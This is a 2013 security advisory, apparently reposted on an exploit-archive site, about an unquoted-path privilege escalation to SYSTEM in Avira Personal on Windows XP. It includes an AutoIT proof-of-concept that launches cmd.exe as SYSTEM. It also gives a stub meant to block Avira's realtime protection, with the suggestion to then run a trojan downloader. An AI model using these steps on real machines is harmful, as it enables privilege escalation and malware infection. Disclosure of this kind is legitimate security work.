Avira Personal Privilege escalation

2013-05-11 / 2013-05-12
Credit: AkaStep
Risk: Medium
Local: Yes
Remote: No

============================================ Tested on OS: Microsoft Windows XP Professional 5.1.2600 Service Pack 2 2600 ============================================ Vulnerable Software: Avira Personal Tested version of Avira: ============================================ Product version 25.10.2012 Search engine 07.05.2013 Virus definition file 08.05.2013 Control Center 21.07.2011 Config Center 21.07.2011 Luke Filewalker 21.07.2011 AntiVir Guard 21.07.2011 Filter 21.07.2011 AntiVir WebGuard 09.05.2011 Scheduler 21.04.2011 Updater 21.07.2011 ============================================ Vulnerability: Privilegie Escalation ============================================ Proof Of concept: If the attacker somehow manages upload any malicious files to root directory of OS installed disk (%homedrive%) in the following manner: C:\Program.exe (In example attacker is limited to execute any file from webserver but is able upload any file to %homedrive%\ ) On next reboot this can be used to escalate privileges to NT_AUTHORITY/SYSTEM due vulnerability in Avira Personal(if that machine uses Avira Personal). ============================================ The main trouble begins from here: http://msdn.microsoft.com/en-us/library/windows/desktop/ms682425%28v=vs.85%29.aspx Parameters lpApplicationName [in, optional] c:\program.exe files\sub dir\program name c:\program files\sub.exe dir\program name c:\program files\sub dir\program.exe name c:\program files\sub dir\program name.exe ============================================ For this purposes i have used the following AutoIT script (then compiled it to 32 bit win32 binary) While 1 sleep(18000);//sleep for 18 seconds for fun MsgBox(64,"","Blah!" & @CRLF & "Woot: We got=> " & @UserName);//display the current user ShellExecute("cmd.exe");//launch cmd.exe ;Enjoy WEnd and uploaded it as Program.exe to C:\ Then simply rebooted machine. Here is result on next reboot: See escal1.PNG http://i052.radikal.ru/1305/69/7bb1ce0323ec.png http://s56.radikal.ru/i152/1305/03/10bc43883c89.png In eg: this vuln can be used in the following situations: http://packetstormsecurity.com/files/121168/MiniWeb-File-Upload-Directory-Traversal.html Attacker is able to upload arbitrary files to system but he/she is unable to execute it. ON next reboot attacker can escalate privileges to SYSTEM privilegie due vulnerability in Avira Personal. This is also possible disable Realtime protection(Guard) of Avira personal in the following way on next reboot: =========================Compile as program.exe and place to %homedrive%\==================== While 1 sleep(3600*1000); WEnd ====Start your another troyan downloader and download/execute known malware to Avira========== ================================================ KUDOSSSSSSS ================================================ packetstormsecurity.org packetstormsecurity.com packetstormsecurity.net securityfocus.com cxsecurity.com security.nnov.ru securtiyvulns.com securitylab.ru secunia.com securityhome.eu exploitsdownload.com osvdb.com websecurity.com.ua 1337day.com itsecuritysolutions.org waraxe.us exploit-db.com ================================================ /AkaStep



Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com


Back to Top